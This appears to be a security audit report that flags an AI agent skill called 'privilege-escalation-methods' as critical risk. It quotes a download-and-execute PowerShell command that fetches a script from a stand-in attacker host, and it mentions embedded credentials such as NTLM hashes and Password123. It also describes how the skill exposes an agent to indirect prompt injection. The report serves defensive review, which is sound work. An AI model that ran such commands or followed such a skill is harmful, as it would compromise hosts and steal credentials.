privilege-escalation-methods
Fail
Audited by Snyk on Feb 28, 2026
Risk Level: CRITICAL
Full Analysis
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The prompt includes commands and examples that embed credentials and secrets verbatim (e.g., user:password, -u/-p flags, /rc4:<NTLM_HASH>, Password123), so an agent following it would need to accept and output secret values directly.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). The URL http://attacker/shell.ps1 is a direct link to a PowerShell script hosted on an untrusted/malicious-looking domain (high-risk for malware delivery), while https://facebook.com is a legitimate site but could be used as a benign lure; the presence of the .ps1 on "attacker" makes the set suspicious.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This skill is explicitly a step-by-step malicious playbook for unauthorized privilege escalation, credential theft, persistence, and Active Directory/domain compromise, clearly intended to enable system compromise and backdoor access.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The skill's SKILL.md explicitly instructs creating a scheduled task that runs "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'" (Golden Ticket with Scheduled Tasks section), which directs the agent/workflow to fetch and execute arbitrary content from an external URL, satisfying ingestion of untrusted third-party content that can change subsequent actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill includes an explicit runtime command that downloads and executes remote code via PowerShell (iex (iwr http://attacker/shell.ps1)), which fetches and runs a remote script during execution.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs the agent on techniques to gain root/Administrator, modify system files, set SUID bits, create persistent backdoors and user accounts, and perform other state-changing actions on target machines, thus encouraging compromise of the host it runs on.
Audit Metadata